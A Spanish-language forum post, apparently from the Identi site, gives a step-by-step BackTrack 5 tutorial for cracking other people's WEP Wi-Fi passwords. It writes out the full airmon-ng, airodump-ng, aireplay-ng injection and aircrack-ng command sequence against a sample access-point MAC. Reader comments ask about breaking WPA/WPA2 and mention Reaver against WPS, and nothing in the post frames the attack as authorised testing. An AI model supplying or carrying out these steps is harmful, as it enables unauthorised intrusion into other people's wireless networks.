Oops.. Este post tiene los enlaces eliminados!

Identi revisa las denuncias de los usuarios en busca de enlaces eliminados que no dejan descargar los archivos, este mensaje te informa que este post que estas viendo tiene los enlaces eliminados.

Usa el Buscador

Por favor, te recomendamos que uses el buscador para encontrar más alternativas.

Crackear claves wep con back track 5

  • Categoría: Reciclaje
  • Publicado hace más de 3 años

hola [email protected] en este nuevo pos les mostrare como decifrar claves wep con back track 5


al final del post les dejo el link para que se lo descarguen


bueno pues empecemos


una vez que ayas descargado y grabado back track a un dvd insertas el dvd en la unidad optica y reinicias tu pc la cual debe de estar configurada de la bios para arrancar desde la unidad de CD/DVD


nos aparecerá de la siguiente manera seleccionamos back track debug ? safe mode, esto para evitar algunos problemas.



despues escribimos el comando

startx


y damos enter


esto iniciara la interface grafica.


lo que sigue es saber el nombre de nuestra interface (tarjeta wireless) para ponerla en modo monitor, asi que abrimos una terminal dando clic en el icono negro es esl que se encuentra al lado derecho de donde dice system



ya que hayamos abierto la terminal escribimos el comando

airmon-ng


y damos enter



ya que conocemos nuestra interface la ponemos en modo monitor airmon-ng start Nombre_de_nuestra_ interface en este caso es wlan0 (variar dependiendo del fabricante de su tarjeta) así que quedaría

airmon-ng start wlan0


y damos enter


ya tenemos nuestra interface en modo monitor (monitor mode enabled on mon0) para verificar que esto es cierto podemos escribir el comando

airmon-ng


y damos enter


nos apaecera de la siguiente manera


Interface Chipset Driver

wlan0 Broadcom b43 ? [phy0]

mon0 Broadcom b43 ? [phy0]

mon0 es la interface en modo monitor.

ahora vamos a escanear las redes disponibles con el comando airodump-ng interface_modo_monitor

quedaría asi
airodump-ng mon0

y damos enter

y comenzara a mostarnos las redes disponibles

detenemos el escaneo
Ctrl+C

escogemos una red y anotamos los siguientes dato el BSSID y CH (canal del punto de acceso)

Siguiente comando
airodump-ng -w redes -c 4 --bssid 00:1F:B3:85:89:d1 mon0

y damos enter

donde

-w
especifica que se va a guardar un archivo

-c
canal del punto de acceso

--bssid
mac del punto de acceso

mon0
interface en modo monitor

nos aparecerá algo asi


abrimos una segunda terminal y escribimos el sig comando
aireplay-ng -1 0 -a 00:1F:B3:85:89:d1 mon0

y damos enter



abrimos una tercera terminal y el siguiente comando aireplay-ng -3 -b mac_punto_de_acceso interface 
quedaría asi 

aireplay-ng -3 -b 00:1F:B3:85:89:d1 mon0

con el cual enviaremos y recibiremos paquetes

vamos a la primera terminal y en la columna
#Data
se incrementara rápidamente, esperamos a que llegue a los 30,000 datos para poder descifrar la clave. cuando tengamos los suficientes datos presionamos
Ctrl+C
en la tercera y primera terminal para detener el envio y captura de datos.

abrimos una cuarta terminal y escribimos el comando
dir
esto nos mostrara los archivos que se guardaron

nos aparecen varios archivos, el que nos interesa es el que tiene la extensión.cap

escribimos el comandoaicrack-ng redes-01.capy descifrara la clave.



aqui dejo el link para que se lo descarguen
este link es por descarga directa


y este otro es por torrent


bueno amigos eso a sido todo espero que les sirva o les funcione cualquier duda aganmelo saber por mp.



Crackear claves wep con back track 5
25 Puntos Score: 6.3/10
Visitas: 1070 Favoritos: 9
Ver los usuarios que votaron...
Más del Autor...
No se encontraron más posts
14 Comentarios Crackear claves wep con back track 5
lo dificil es la wap  
ypara las claves WPA no hay , saludos
Cita superhuevo: Mostrar
tienes que descargar un diccionario y aun haci es muy dificil que te de la clave wpa
@BETO_ORTIZ es que es la que me interesa la claves WEP , desde el ipod facil las hackea
las WPA2 solo hay que tener paciencia, unas 6 a 10 horas , y unas cuantas condiciones no son para todas , pero si hay forma , y es bien facil  
para las wep , minidwep y eran en unos minutos  
Mas claro hechale agua , buen post! 5+
Cita hugoneitor: Mostrar
Como haces para las WPA2?? e intentado de todo y no e podido.
@hugoneitor intente con el wifislax una wpa y pues solo me queda decir que casi ni paquetes le pude sacar, aun despues de inyectar. Asi que si se lleva much?
Cita mastero102: Mostrar
amigo sube algo respecto alo de las contrase?
tengo entendido que para las claves WPA/WPA2 hay un programa dentro de backtrack llamado Reaver que utiliza la vulnerabilidad de la clave WPS para descifrar la clave WPA, si pudieras hacer un post sobre eso estar?
las wep es los mas f?
jejjjejeje genial amigooo con esto se empiesa XD    el la facil wep   espero  que publiques la wpa   con unos dic    y  de identificaci?
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!